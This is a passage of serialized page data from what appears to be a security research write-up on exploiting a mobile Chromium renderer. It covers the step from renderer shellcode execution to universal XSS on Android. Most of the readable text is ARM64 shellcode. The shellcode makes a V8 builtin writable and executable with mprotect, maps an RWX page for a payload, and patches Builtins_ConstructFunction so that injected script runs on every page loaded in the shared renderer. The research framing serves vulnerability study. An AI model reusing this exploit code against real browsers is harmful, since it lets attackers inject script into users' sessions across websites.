alue":7797},{"type":25,"tag":216,"props":143140,"children":143141},{"class":6922,"line":7613},[143142,143146,143150,143154,143158,143162,143166,143170,143174,143178],{"type":25,"tag":216,"props":143143,"children":143144},{"style":6947},[143145],{"type":31,"value":139913},{"type":25,"tag":216,"props":143147,"children":143148},{"style":6953},[143149],{"type":31,"value":6956},{"type":25,"tag":216,"props":143151,"children":143152},{"style":6964},[143153],{"type":31,"value":7016},{"type":25,"tag":216,"props":143155,"children":143156},{"style":6973},[143157],{"type":31,"value":36878},{"type":25,"tag":216,"props":143159,"children":143160},{"style":6947},[143161],{"type":31,"value":139868},{"type":25,"tag":216,"props":143163,"children":143164},{"style":6964},[143165],{"type":31,"value":179},{"type":25,"tag":216,"props":143167,"children":143168},{"style":7047},[143169],{"type":31,"value":61533},{"type":25,"tag":216,"props":143171,"children":143172},{"style":6964},[143173],{"type":31,"value":139942},{"type":25,"tag":216,"props":143175,"children":143176},{"style":6947},[143177],{"type":31,"value":43115},{"type":25,"tag":216,"props":143179,"children":143180},{"style":6964},[143181],{"type":31,"value":6967},{"type":25,"tag":216,"props":143183,"children":143184},{"class":6922,"line":7636},[143185,143189,143193,143197,143201,143206,143210,143214],{"type":25,"tag":216,"props":143186,"children":143187},{"style":6947},[143188],{"type":31,"value":105902},{"type":25,"tag":216,"props":143190,"children":143191},{"style":6964},[143192],{"type":31,"value":179},{"type":25,"tag":216,"props":143194,"children":143195},{"style":7047},[143196],{"type":31,"value":105911},{"type":25,"tag":216,"props":143198,"children":143199},{"style":6964},[143200],{"type":31,"value":1850},{"type":25,"tag":216,"props":143202,"children":143203},{"style":8205},[143204],{"type":31,"value":143205},"'DeserializeWasmModule result: '",{"type":25,"tag":216,"props":143207,"children":143208},{"style":6953},[143209],{"type":31,"value":12858},{"type":25,"tag":216,"props":143211,"children":143212},{"style":6947},[143213],{"type":31,"value":13115},{"type":25,"tag":216,"props":143215,"children":143216},{"style":6964},[143217],{"type":31,"value":7797},{"type":25,"tag":216,"props":143219,"children":143220},{"class":6922,"line":7645},[143221,143225,143229,143233,143237,143241,143245,143249,143253,143257],{"type":25,"tag":216,"props":143222,"children":143223},{"style":6936},[143224],{"type":31,"value":40151},{"type":25,"tag":216,"props":143226,"children":143227},{"style":6947},[143228],{"type":31,"value":139962},{"type":25,"tag":216,"props":143230,"children":143231},{"style":6953},[143232],{"type":31,"value":6956},{"type":25,"tag":216,"props":143234,"children":143235},{"style":6936},[143236],{"type":31,"value":35895},{"type":25,"tag":216,"props":143238,"children":143239},{"style":6947},[143240],{"type":31,"value":137730},{"type":25,"tag":216,"props":143242,"children":143243},{"style":6964},[143244],{"type":31,"value":179},{"type":25,"tag":216,"props":143246,"children":143247},{"style":7047},[143248],{"type":31,"value":137784},{"type":25,"tag":216,"props":143250,"children":143251},{"style":6964},[143252],{"type":31,"value":1850},{"type":25,"tag":216,"props":143254,"children":143255},{"style":6947},[143256],{"type":31,"value":13037},{"type":25,"tag":216,"props":143258,"children":143259},{"style":6964},[143260],{"type":31,"value":7797},{"type":25,"tag":216,"props":143262,"children":143263},{"class":6922,"line":7654},[143264,143268,143272,143276,143280,143284,143288,143292,143296],{"type":25,"tag":216,"props":143265,"children":143266},{"style":6936},[143267],{"type":31,"value":40151},{"type":25,"tag":216,"props":143269,"children":143270},{"style":6947},[143271],{"type":31,"value":36933},{"type":25,"tag":216,"props":143273,"children":143274},{"style":6953},[143275],{"type":31,"value":6956},{"type":25,"tag":216,"props":143277,"children":143278},{"style":6947},[143279],{"type":31,"value":139962},{"type":25,"tag":216,"props":143281,"children":143282},{"style":6964},[143283],{"type":31,"value":179},{"type":25,"tag":216,"props":143285,"children":143286},{"style":6947},[143287],{"type":31,"value":41849},{"type":25,"tag":216,"props":143289,"children":143290},{"style":6964},[143291],{"type":31,"value":179},{"type":25,"tag":216,"props":143293,"children":143294},{"style":6947},[143295],{"type":31,"value":137833},{"type":25,"tag":216,"props":143297,"children":143298},{"style":6964},[143299],{"type":31,"value":6967},{"type":25,"tag":216,"props":143301,"children":143302},{"class":6922,"line":7722},[143303,143307,143311,143315,143319,143323],{"type":25,"tag":216,"props":143304,"children":143305},{"style":6947},[143306],{"type":31,"value":105902},{"type":25,"tag":216,"props":143308,"children":143309},{"style":6964},[143310],{"type":31,"value":179},{"type":25,"tag":216,"props":143312,"children":143313},{"style":7047},[143314],{"type":31,"value":105911},{"type":25,"tag":216,"props":143316,"children":143317},{"style":6964},[143318],{"type":31,"value":1850},{"type":25,"tag":216,"props":143320,"children":143321},{"style":6947},[143322],{"type":31,"value":37047},{"type":25,"tag":216,"props":143324,"children":143325},{"style":6964},[143326],{"type":31,"value":7797},{"type":25,"tag":216,"props":143328,"children":143329},{"class":6922,"line":7730},[143330],{"type":25,"tag":216,"props":143331,"children":143332},{"style":6964},[143333],{"type":31,"value":105943},{"type":25,"tag":38,"props":143335,"children":143336},{},[143337],{"type":31,"value":143338},"And this time, it works as expected:",{"type":25,"tag":38,"props":143340,"children":143341},{},[143342],{"type":25,"tag":6467,"props":143343,"children":143346},{"alt":143344,"src":143345},"image3","/posts/mobile-renderer-rce/image3.png",[],{"type":25,"tag":606,"props":143348,"children":143350},{"id":143349},"achieving-universal-xss",[143351],{"type":31,"value":143352},"Achieving Universal XSS",{"type":25,"tag":38,"props":143354,"children":143355},{},[143356,143358,143364,143366,143373],{"type":31,"value":143357},"At this point, we have arbitrary shellcode execution in the renderer process. While usually the exploit stops here and further access would require a browser sandbox escape, we decided to explore an alternative route known as UXSS, inspired by this ",{"type":25,"tag":162,"props":143359,"children":143362},{"href":143360,"rel":143361},"https://i.blackhat.com/Asia-24/Presentations/Asia-24-Liu-The-Hole-in-Sandbox.pdf",[166],[143363],{"type":31,"value":74301},{"type":31,"value":143365}," from Tencent Security and ",{"type":25,"tag":162,"props":143367,"children":143370},{"href":143368,"rel":143369},"https://www.interruptlabs.co.uk/articles/one-click-memory-corruption-in-alibabas-uc-browser-exploiting-patch-gap-v8-vulnerabilities-to-steal-your-data",[166],[143371],{"type":31,"value":143372},"research article",{"type":31,"value":143374}," from InterruptLabs.",{"type":25,"tag":38,"props":143376,"children":143377},{},[143378,143380,143387],{"type":31,"value":143379},"Unlike a normal XSS, a UXSS, or universal XSS, is a client side browser exploit that enables arbitrary JavaScript injection in all pages of a website. Normally, site isolation on desktop Chromium prevents this, as each site ends up in a different renderer process, but Android specifically has a ",{"type":25,"tag":162,"props":143381,"children":143384},{"href":143382,"rel":143383},"https://www.chromium.org/Home/chromium-security/site-isolation/#android",[166],[143385],{"type":31,"value":143386},"weaker version",{"type":31,"value":143388}," of this mitigation - only sites with logins and COOP headers are per process isolated. This means that the majority of webpages are in the same renderer process, so any patches to the interpreter will affect them all and lead to UXSS. This is still quite the capability!",{"type":25,"tag":38,"props":143390,"children":143391},{},[143392,143394,143400],{"type":31,"value":143393},"To achieve UXSS, we need to patch a function that’s invoked during site loading so we can run our XSS payload. During debugging, we observed that every site we visited eventually called ",{"type":25,"tag":82,"props":143395,"children":143397},{"className":143396},[],[143398],{"type":31,"value":143399},"Builtins_ConstructFunction",{"type":31,"value":143401},", making it a natural target.",{"type":25,"tag":38,"props":143403,"children":143404},{},[143405,143407,143412],{"type":31,"value":143406},"Our goal is for ",{"type":25,"tag":82,"props":143408,"children":143410},{"className":143409},[],[143411],{"type":31,"value":143399},{"type":31,"value":143413}," to execute our XSS payload first, then continue its normal behavior. To do this, we hook it as follows:",{"type":25,"tag":2039,"props":143415,"children":143416},{},[143417,143422,143432],{"type":25,"tag":2043,"props":143418,"children":143419},{},[143420],{"type":31,"value":143421},"The exploit’s shellcode patches the first few instructions to redirect execution to our mmap-ed shellcode, which runs the XSS payload",{"type":25,"tag":2043,"props":143423,"children":143424},{},[143425,143427],{"type":31,"value":143426},"After finishing, the mmap-ed shellcode restores the original instructions in ",{"type":25,"tag":82,"props":143428,"children":143430},{"className":143429},[],[143431],{"type":31,"value":143399},{"type":25,"tag":2043,"props":143433,"children":143434},{},[143435,143437,143442],{"type":31,"value":143436},"The mmap-ed shellcode then returns to the beginning of ",{"type":25,"tag":82,"props":143438,"children":143440},{"className":143439},[],[143441],{"type":31,"value":143399},{"type":31,"value":143443},", which now proceeds normally",{"type":25,"tag":38,"props":143445,"children":143446},{},[143447],{"type":31,"value":143448},"The ARM64 shellcode implementing this looks as follows:",{"type":25,"tag":206,"props":143450,"children":143454},{"code":143451,"language":143452,"meta":7,"className":143453,"style":7},"// get return addr to x0\nldr x0, [sp, #0x18]\n// strip pac signature from return address\n.arch armv8.3-a; xpaci x0\n\n// store x5 = Builtins_ConstructFunction\nmovz x1, #0x610c\nsub x0, x0, x1\nmov x5, x0\n\n// store x4 = page aligned ConstructFunction\nmovz x1, #0xf000\nmovk x1, #0xffff, lsl #16\nmovk x1, #0xffff, lsl #32\nand x4, x5, x1\n\n// mprotect page aligned ConstructFunction RWX\nmov x0, x4\nmov x1, #0x2000\nmov x2, #0x7\nmov x8, #226\nsvc #0\n\nmov x6, x5\n\n// mmap RWX for jump dest (uxss_sc)\nmov x0, #0\nmov x1, #0x1000\nmov x2, #0x7\nmov x3, #34\nmov x4, #-1\nmov x5, #0\nmov x8, #222\nsvc #0\n\nmov x5, x0\n\n// at this point:\n// x6 = Builtins_ConstructFunction\n// x5 = mmap page for uxss_sc\n\n// write uxss_sc to mmaped rwx page\n{write_sc(uxss_sc, \"x5\")}\n\n// wipe from cache\nmov x0, x5\n{WIPE_CACHE}\n\n// patch Builtins_ConstructFunction\n{write_sc(new_compile_instrs, \"x6\")}\n// and add a pointer to uxss_sc just above new instructions\nstr x5, [x6, #{5 * INSTR_SIZE}]\n\n// wipe from cache\nmov x0, x6\n{WIPE_CACHE}\n","asm","language-asm shiki shiki-themes slack-dark",[143455],{"type":25,"tag":82,"props":143456,"children":143457},{"__ignoreMap":7},[143458,143466,143474,143482,143490,143497,143505,143513,143521,143529,143536,143544,143552,143560,143568,143576,143583,143591,143599,143607,143615,143623,143631,143638,143646,143653,143661,143669,143677,143684,143692,143700,143708,143716,143723,143730,143737,143744,143752,143760,143768,143775,143783,143791,143798,143806,143814,143822,143829,143837,143845,143853,143861,143868,143875,143883],{"type":25,"tag":216,"props":143459,"children":143460},{"class":6922,"line":6923},[143461],{"type":25,"tag":216,"props":143462,"children":143463},{},[143464],{"type":31,"value":143465},"// get return addr to x0\n",{"type":25,"tag":216,"props":143467,"children":143468},{"class":6922,"line":6769},[143469],{"type":25,"tag":216,"props":143470,"children":143471},{},[143472],{"type":31,"value":143473},"ldr x0, [sp, #0x18]\n",{"type":25,"tag":216,"props":143475,"children":143476},{"class":6922,"line":6778},[143477],{"type":25,"tag":216,"props":143478,"children":143479},{},[143480],{"type":31,"value":143481},"// strip pac signature from return address\n",{"type":25,"tag":216,"props":143483,"children":143484},{"class":6922,"line":7005},[143485],{"type":25,"tag":216,"props":143486,"children":143487},{},[143488],{"type":31,"value":143489},".arch armv8.3-a; xpaci x0\n",{"type":25,"tag":216,"props":143491,"children":143492},{"class":6922,"line":7110},[143493],{"type":25,"tag":216,"props":143494,"children":143495},{"emptyLinePlaceholder":16},[143496],{"type":31,"value":7642},{"type":25,"tag":216,"props":143498,"children":143499},{"class":6922,"line":7216},[143500],{"type":25,"tag":216,"props":143501,"children":143502},{},[143503],{"type":31,"value":143504},"// store x5 = Builtins_ConstructFunction\n",{"type":25,"tag":216,"props":143506,"children":143507},{"class":6922,"line":7244},[143508],{"type":25,"tag":216,"props":143509,"children":143510},{},[143511],{"type":31,"value":143512},"movz x1, #0x610c\n",{"type":25,"tag":216,"props":143514,"children":143515},{"class":6922,"line":7257},[143516],{"type":25,"tag":216,"props":143517,"children":143518},{},[143519],{"type":31,"value":143520},"sub x0, x0, x1\n",{"type":25,"tag":216,"props":143522,"children":143523},{"class":6922,"line":7275},[143524],{"type":25,"tag":216,"props":143525,"children":143526},{},[143527],{"type":31,"value":143528},"mov x5, x0\n",{"type":25,"tag":216,"props":143530,"children":143531},{"class":6922,"line":7296},[143532],{"type":25,"tag":216,"props":143533,"children":143534},{"emptyLinePlaceholder":16},[143535],{"type":31,"value":7642},{"type":25,"tag":216,"props":143537,"children":143538},{"class":6922,"line":7305},[143539],{"type":25,"tag":216,"props":143540,"children":143541},{},[143542],{"type":31,"value":143543},"// store x4 = page aligned ConstructFunction\n",{"type":25,"tag":216,"props":143545,"children":143546},{"class":6922,"line":7557},[143547],{"type":25,"tag":216,"props":143548,"children":143549},{},[143550],{"type":31,"value":143551},"movz x1, #0xf000\n",{"type":25,"tag":216,"props":143553,"children":143554},{"class":6922,"line":7574},[143555],{"type":25,"tag":216,"props":143556,"children":143557},{},[143558],{"type":31,"value":143559},"movk x1, #0xffff, lsl #16\n",{"type":25,"tag":216,"props":143561,"children":143562},{"class":6922,"line":7591},[143563],{"type":25,"tag":216,"props":143564,"children":143565},{},[143566],{"type":31,"value":143567},"movk x1, #0xffff, lsl #32\n",{"type":25,"tag":216,"props":143569,"children":143570},{"class":6922,"line":7604},[143571],{"type":25,"tag":216,"props":143572,"children":143573},{},[143574],{"type":31,"value":143575},"and x4, x5, x1\n",{"type":25,"tag":216,"props":143577,"children":143578},{"class":6922,"line":7613},[143579],{"type":25,"tag":216,"props":143580,"children":143581},{"emptyLinePlaceholder":16},[143582],{"type":31,"value":7642},{"type":25,"tag":216,"props":143584,"children":143585},{"class":6922,"line":7636},[143586],{"type":25,"tag":216,"props":143587,"children":143588},{},[143589],{"type":31,"value":143590},"// mprotect page aligned ConstructFunction RWX\n",{"type":25,"tag":216,"props":143592,"children":143593},{"class":6922,"line":7645},[143594],{"type":25,"tag":216,"props":143595,"children":143596},{},[143597],{"type":31,"value":143598},"mov x0, x4\n",{"type":25,"tag":216,"props":143600,"children":143601},{"class":6922,"line":7654},[143602],{"type":25,"tag":216,"props":143603,"children":143604},{},[143605],{"type":31,"value":143606},"mov x1, #0x2000\n",{"type":25,"tag":216,"props":143608,"children":143609},{"class":6922,"line":7722},[143610],{"type":25,"tag":216,"props":143611,"children":143612},{},[143613],{"type":31,"value":143614},"mov x2, #0x7\n",{"type":25,"tag":216,"props":143616,"children":143617},{"class":6922,"line":7730},[143618],{"type":25,"tag":216,"props":143619,"children":143620},{},[143621],{"type":31,"value":143622},"mov x8, #226\n",{"type":25,"tag":216,"props":143624,"children":143625},{"class":6922,"line":7760},[143626],{"type":25,"tag":216,"props":143627,"children":143628},{},[143629],{"type":31,"value":143630},"svc #0\n",{"type":25,"tag":216,"props":143632,"children":143633},{"class":6922,"line":7768},[143634],{"type":25,"tag":216,"props":143635,"children":143636},{"emptyLinePlaceholder":16},[143637],{"type":31,"value":7642},{"type":25,"tag":216,"props":143639,"children":143640},{"class":6922,"line":7800},[143641],{"type":25,"tag":216,"props":143642,"children":143643},{},[143644],{"type":31,"value":143645},"mov x6, x5\n",{"type":25,"tag":216,"props":143647,"children":143648},{"class":6922,"line":7808},[143649],{"type":25,"tag":216,"props":143650,"children":143651},{"emptyLinePlaceholder":16},[143652],{"type":31,"value":7642},{"type":25,"tag":216,"props":143654,"children":143655},{"class":6922,"line":7868},[143656],{"type":25,"tag":216,"props":143657,"children":143658},{},[143659],{"type":31,"value":143660},"// mmap RWX for jump dest (uxss_sc)\n",{"type":25,"tag":216,"props":143662,"children":143663},{"class":6922,"line":13001},[143664],{"type":25,"tag":216,"props":143665,"children":143666},{},[143667],{"type":31,"value":143668},"mov x0, #0\n",{"type":25,"tag":216,"props":143670,"children":143671},{"class":6922,"line":13019},[143672],{"type":25,"tag":216,"props":143673,"children":143674},{},[143675],{"type":31,"value":143676},"mov x1, #0x1000\n",{"type":25,"tag":216,"props":143678,"children":143679},{"class":6922,"line":13064},[143680],{"type":25,"tag":216,"props":143681,"children":143682},{},[143683],{"type":31,"value":143614},{"type":25,"tag":216,"props":143685,"children":143686},{"class":6922,"line":13170},[143687],{"type":25,"tag":216,"props":143688,"children":143689},{},[143690],{"type":31,"value":143691},"mov x3, #34\n",{"type":25,"tag":216,"props":143693,"children":143694},{"class":6922,"line":27455},[143695],{"type":25,"tag":216,"props":143696,"children":143697},{},[143698],{"type":31,"value":143699},"mov x4, #-1\n",{"type":25,"tag":216,"props":143701,"children":143702},{"class":6922,"line":27490},[143703],{"type":25,"tag":216,"props":143704,"children":143705},{},[143706],{"type":31,"value":143707},"mov x5, #0\n",{"type":25,"tag":216,"props":143709,"children":143710},{"class":6922,"line":27498},[143711],{"type":25,"tag":216,"props":143712,"children":143713},{},[143714],{"type":31,"value":143715},"mov x8, #222\n",{"type":25,"tag":216,"props":143717,"children":143718},{"class":6922,"line":27506},[143719],{"type":25,"tag":216,"props":143720,"children":143721},{},[143722],{"type":31,"value":143630},{"type":25,"tag":216,"props":143724,"children":143725},{"class":6922,"line":27515},[143726],{"type":25,"tag":216,"props":143727,"children":143728},{"emptyLinePlaceholder":16},[143729],{"type":31,"value":7642},{"type":25,"tag":216,"props":143731,"children":143732},{"class":6922,"line":27557},[143733],{"type":25,"tag":216,"props":143734,"children":143735},{},[143736],{"type":31,"value":143528},{"type":25,"tag":216,"props":143738,"children":143739},{"class":6922,"line":27590},[143740],{"type":25,"tag":216,"props":143741,"children":143742},{"emptyLinePlaceholder":16},[143743],{"type":31,"value":7642},{"type":25,"tag":216,"props":143745,"children":143746},{"class":6922,"line":27598},[143747],{"type":25,"tag":216,"props":143748,"children":143749},{},[143750],{"type":31,"value":143751},"// at this point:\n",{"type":25,"tag":216,"props":143753,"children":143754},{"class":6922,"line":27606},[143755],{"type":25,"tag":216,"props":143756,"children":143757},{},[143758],{"type":31,"value":143759},"// x6 = Builtins_ConstructFunction\n",{"type":25,"tag":216,"props":143761,"children":143762},{"class":6922,"line":27615},[143763],{"type":25,"tag":216,"props":143764,"children":143765},{},[143766],{"type":31,"value":143767},"// x5 = mmap page for uxss_sc\n",{"type":25,"tag":216,"props":143769,"children":143770},{"class":6922,"line":27691},[143771],{"type":25,"tag":216,"props":143772,"children":143773},{"emptyLinePlaceholder":16},[143774],{"type":31,"value":7642},{"type":25,"tag":216,"props":143776,"children":143777},{"class":6922,"line":27724},[143778],{"type":25,"tag":216,"props":143779,"children":143780},{},[143781],{"type":31,"value":143782},"// write uxss_sc to mmaped rwx page\n",{"type":25,"tag":216,"props":143784,"children":143785},{"class":6922,"line":27732},[143786],{"type":25,"tag":216,"props":143787,"children":143788},{},[143789],{"type":31,"value":143790},"{write_sc(uxss_sc, \"x5\")}\n",{"type":25,"tag":216,"props":143792,"children":143793},{"class":6922,"line":27740},[143794],{"type":25,"tag":216,"props":143795,"children":143796},{"emptyLinePlaceholder":16},[143797],{"type":31,"value":7642},{"type":25,"tag":216,"props":143799,"children":143800},{"class":6922,"line":27777},[143801],{"type":25,"tag":216,"props":143802,"children":143803},{},[143804],{"type":31,"value":143805},"// wipe from cache\n",{"type":25,"tag":216,"props":143807,"children":143808},{"class":6922,"line":27790},[143809],{"type":25,"tag":216,"props":143810,"children":143811},{},[143812],{"type":31,"value":143813},"mov x0, x5\n",{"type":25,"tag":216,"props":143815,"children":143816},{"class":6922,"line":27803},[143817],{"type":25,"tag":216,"props":143818,"children":143819},{},[143820],{"type":31,"value":143821},"{WIPE_CACHE}\n",{"type":25,"tag":216,"props":143823,"children":143824},{"class":6922,"line":27816},[143825],{"type":25,"tag":216,"props":143826,"children":143827},{"emptyLinePlaceholder":16},[143828],{"type":31,"value":7642},{"type":25,"tag":216,"props":143830,"children":143831},{"class":6922,"line":27870},[143832],{"type":25,"tag":216,"props":143833,"children":143834},{},[143835],{"type":31,"value":143836},"// patch Builtins_ConstructFunction\n",{"type":25,"tag":216,"props":143838,"children":143839},{"class":6922,"line":27879},[143840],{"type":25,"tag":216,"props":143841,"children":143842},{},[143843],{"type":31,"value":143844},"{write_sc(new_compile_instrs, \"x6\")}\n",{"type":25,"tag":216,"props":143846,"children":143847},{"class":6922,"line":36243},[143848],{"type":25,"tag":216,"props":143849,"children":143850},{},[143851],{"type":31,"value":143852},"// and add a pointer to uxss_sc just above new instructions\n",{"type":25,"tag":216,"props":143854,"children":143855},{"class":6922,"line":36264},[143856],{"type":25,"tag":216,"props":143857,"children":143858},{},[143859],{"type":31,"value":143860},"str x5, [x6, #{5 * INSTR_SIZE}]\n",{"type":25,"tag":216,"props":143862,"children":143863},{"class":6922,"line":84923},[143864],{"type":25,"tag":216,"props":143865,"children":143866},{"emptyLinePlaceholder":16},[143867],{"type":31,"value":7642},{"type":25,"tag":216,"props":143869,"children":143870},{"class":6922,"line":84936},[143871],{"type":25,"tag":216,"props":143872,"children":143873},{},[143874],{"type":31,"value":143805},{"type":25,"tag":216,"props":143876,"children":143877},{"class":6922,"line":84944},[143878],{"type":25,"tag":216,"props":143879,"children":143880},{},[143881],{"type":31,"value":143882},"mov x0, x6\n",{"type":25,"tag":216,"props":143884,"children":143885},{"class":6922,"line":84952},[143886],{"type":25,"tag":216,"props":143887,"children":143888},{},[143889],{"type":31,"value":143821},{"type":25,"tag":38,"props":143891,"children":143892},{},[143893,143895,143901,143903,143908,143910,143916],{"type":31,"value":143894},"In the snippet above, ",{"type":25,"tag":82,"props":143896,"children":143898},{"className":143897},[],[143899],{"type":31,"value":143900},"new_compile_instrs",{"type":31,"value":143902}," refers to the instructions written to the beginning of ",{"type":25,"tag":82,"props":143904,"children":143906},{"className":143905},[],[143907],{"type":31,"value":143399},{"type":31,"value":143909}," that invoke the ",{"type":25,"tag":82,"props":143911,"children":143913},{"className":143912},[],[143914],{"type":31,"value":143915},"uxss_sc",{"type":31,"value":143917}," mmap-ed shellcode:",{"type":25,"tag":206,"props":143919,"children":143921},{"code":143920,"language":143452,"meta":7,"className":143453,"style":7},"bti c\n\n// store registers that will be overwritten\nstp x15, lr, [sp, #-16]!\n\n// get current rip into x15\nadr x15, .\n\n// load the uxss_sc pointer saved just above new instructions\nldr x15, [x15, #{3 * INSTR_SIZE}]\n\n// jump to uxss_sc\nblr x15\n",[143922],{"type":25,"tag":82,"props":143923,"children":143924},{"__ignoreMap":7},[143925,143933,143940,143948,143956,143963,143971,143979,143986,143994,144002,144009,144017],{"type":25,"tag":216,"props":143926,"children":143927},{"class":6922,"line":6923},[143928],{"type":25,"tag":216,"props":143929,"children":143930},{},[143931],{"type":31,"value":143932},"bti c\n",{"type":25,"tag":216,"props":143934,"children":143935},{"class":6922,"line":6769},[143936],{"type":25,"tag":216,"props":143937,"children":143938},{"emptyLinePlaceholder":16},[143939],{"type":31,"value":7642},{"type":25,"tag":216,"props":143941,"children":143942},{"class":6922,"line":6778},[143943],{"type":25,"tag":216,"props":143944,"children":143945},{},[143946],{"type":31,"value":143947},"// store registers that will be overwritten\n",{"type":25,"tag":216,"props":143949,"children":143950},{"class":6922,"line":7005},[143951],{"type":25,"tag":216,"props":143952,"children":143953},{},[143954],{"type":31,"value":143955},"stp x15, lr, [sp, #-16]!\n",{"type":25,"tag":216,"props":143957,"children":143958},{"class":6922,"line":7110},[143959],{"type":25,"tag":216,"props":143960,"children":143961},{"emptyLinePlaceholder":16},[143962],{"type":31,"value":7642},{"type":25,"tag":216,"props":143964,"children":143965},{"class":6922,"line":7216},[143966],{"type":25,"tag":216,"props":143967,"children":143968},{},[143969],{"type":31,"value":143970},"// get current rip into x15\n",{"type":25,"tag":216,"props":143972,"children":143973},{"class":6922,"line":7244},[143974],{"type":25,"tag":216,"props":143975,"children":143976},{},[143977],{"type":31,"value":143978},"adr x15, .\n",{"type":25,"tag":216,"props":143980,"children":143981},{"class":6922,"line":7257},[143982],{"type":25,"tag":216,"props":143983,"children":143984},{"emptyLinePlaceholder":16},[143985],{"type":31,"value":7642},{"type":25,"tag":216,"props":143987,"children":143988},{"class":6922,"line":7275},[143989],{"type":25,"tag":216,"props":143990,"children":143991},{},[143992],{"type":31,"value":143993},"// load the uxss_sc pointer saved just above new instructions\n",{"type":25,"tag":216,"props":143995,"children":143996},{"class":6922,"line":7296},[143997],{"type":25,"tag":216,"props":143998,"children":143999},{},[144000],{"type":31,"value":144001},"ldr x15, [x15, #{3 * INSTR_SIZE}]\n",{"type":25,"tag":216,"props":144003,"children":144004},{"class":6922,"line":7305},[144005],{"type":25,"tag":216,"props":144006,"children":144007},{"emptyLinePlaceholder":16},[144008],{"type":31,"value":7642},{"type":25,"tag":216,"props":144010,"children":144011},{"class":6922,"line":7557},[144012],{"type":25,"tag":216,"props":144013,"children":144014},{},[144015],{"type":31,"value":144016},"// jump to uxss_sc\n",{"type":25,"tag":216,"props":144018,"children":144019},{"class":6922,"line":7574},[144020],{"type":25,"tag":216,"props":144021,"children":144022},{},[144023],{"type":31,"value":144024},"blr x15\n",{"type":25,"tag":38,"props":144026,"children":144027},{},[144028,144033,144035,144040],{"type":25,"tag":82,"props":144029,"children":144031},{"className":144030},[],[144032],{"type":31,"value":143915},{"type":31,"value":144034}," is the mmap-ed shellcode invoked by the patched ",{"type":25,"tag":82,"props":144036,"children":144038},{"className":144037},[],[144039],{"type":31,"value":143399},{"type":31,"value":144041}," to execute our XSS payload. Its prologue looks like this:",{"type":25,"tag":206,"props":144043,"children":144045},{"code":144044,"language":143452,"meta":7,"className":143453,"style":7},"bti c\n\n// Save full register context\nstp x0,  x1,  [sp, #-16]!\nstp x2,  x3,  [sp, #-16]!\nstp x4,  x5,  [sp, #-16]!\nstp x6,  x7,  [sp, #-16]!\nstp x8,  x9,  [sp, #-16]!\nstp x10, x11, [sp, #-16]!\nstp x12, x13, [sp, #-16]!\nstp x14, x15, [sp, #-16]!\nstp x16, x17, [sp, #-16]!\nstp x18, x19, [sp, #-16]!\nstp x20, x21, [sp, #-16]!\nstp x22, x23, [sp, #-16]!\nstp x24, x25, [sp, #-16]!\nstp x26, x27, [sp, #-16]!\nstp x28, x29, [sp, #-16]!\nstr lr, [sp, #-16]!\n",[144046],{"type":25,"tag":82,"props":144047,"children":144048},{"__ignoreMap":7},[144049,144056,144063,144071,144079,144087,144095,144103,144111,144119,144127,144135,144143,144151,144159,144167,144175,144183,144191],{"type":25,"tag":216,"props":144050,"children":144051},{"class":6922,"line":6923},[144052],{"type":25,"tag":216,"props":144053,"children":144054},{},[144055],{"type":31,"value":143932},{"type":25,"tag":216,"props":144057,"children":144058},{"class":6922,"line":6769},[144059],{"type":25,"tag":216,"props":144060,"children":144061},{"emptyLinePlaceholder":16},[144062],{"type":31,"value":7642},{"type":25,"tag":216,"props":144064,"children":144065},{"class":6922,"line":6778},[144066],{"type":25,"tag":216,"props":144067,"children":144068},{},[144069],{"type":31,"value":144070},"// Save full register context\n",{"type":25,"tag":216,"props":144072,"children":144073},{"class":6922,"line":7005},[144074],{"type":25,"tag":216,"props":144075,"children":144076},{},[144077],{"type":31,"value":144078},"stp x0,  x1,  [sp, #-16]!\n",{"type":25,"tag":216,"props":144080,"children":144081},{"class":6922,"line":7110},[144082],{"type":25,"tag":216,"props":144083,"children":144084},{},[144085],{"type":31,"value":144086},"stp x2,  x3,  [sp, #-16]!\n",{"type":25,"tag":216,"props":144088,"children":144089},{"class":6922,"line":7216},[144090],{"type":25,"tag":216,"props":144091,"children":144092},{},[144093],{"type":31,"value":144094},"stp x4,  x5,  [sp, #-16]!\n",{"type":25,"tag":216,"props":144096,"children":144097},{"class":6922,"line":7244},[144098],{"type":25,"tag":216,"props":144099,"children":144100},{},[144101],{"type":31,"value":144102},"stp x6,  x7,  [sp, #-16]!\n",{"type":25,"tag":216,"props":144104,"children":144105},{"class":6922,"line":7257},[144106],{"type":25,"tag":216,"props":144107,"children":144108},{},[144109],{"type":31,"value":144110},"stp x8,  x9,  [sp, #-16]!\n",{"type":25,"tag":216,"props":144112,"children":144113},{"class":6922,"line":7275},[144114],{"type":25,"tag":216,"props":144115,"children":144116},{},[144117],{"type":31,"value":144118},"stp x10, x11, [sp, #-16]!\n",{"type":25,"tag":216,"props":144120,"children":144121},{"class":6922,"line":7296},[144122],{"type":25,"tag":216,"props":144123,"children":144124},{},[144125],{"type":31,"value":144126},"stp x12, x13, [sp, #-16]!\n",{"type":25,"tag":216,"props":144128,"children":144129},{"class":6922,"line":7305},[144130],{"type":25,"tag":216,"props":144131,"children":144132},{},[144133],{"type":31,"value":144134},"stp x14, x15, [sp, #-16]!\n",{"type":25,"tag":216,"props":144136,"children":144137},{"class":6922,"line":7557},[144138],{"type":25,"tag":216,"props":144139,"children":144140},{},[144141],{"type":31,"value":144142},"stp x16, x17, [sp, #-16]!\n",{"type":25,"tag":216,"props":144144,"children":144145},{"class":6922,"line":7574},[144146],{"type":25,"tag":216,"props":144147,"children":144148},{},[144149],{"type":31,"value":144150},"stp x18, x19, [sp, #-16]!\n",{"type":25,"tag":216,"props":144152,"children":144153},{"class":6922,"line":7591},[144154],{"type":25,"tag":216,"props":144155,"children":144156},{},[144157],{"type":31,"value":144158},"stp x20, x21, [sp, #-16]!\n",{"type":25,"tag":216,"props":144160,"children":144161},{"class":6922,"line":7604},[144162],{"type":25,"tag":216,"props":144163,"children":144164},{},[144165],{"type":31,"value":144166},"stp x22, x23, [sp, #-16]!\n",{"type":25,"tag":216,"props":144168,"children":144169},{"class":6922,"line":7613},[144170],{"type":25,"tag":216,"props":144171,"children":144172},{},[144173],{"type":31,"value":144174},"stp x24, x25, [sp, #-16]!\n",{"type":25,"tag":216,"props":144176,"children":144177},{"class":6922,"line":7636},[144178],{"type":25,"tag":216,"props":144179,"children":144180},{},[144181],{"type":31,"value":144182},"stp x26, x27, [sp, #-16]!\n",{"type":25,"tag":216,"props":144184,"children":144185},{"class":6922,"line":7645},[144186],{"type":25,"tag":216,"props":144187,"children":144188},{},[144189],{"type":31,"value":144190},"stp x28, x29, [sp, 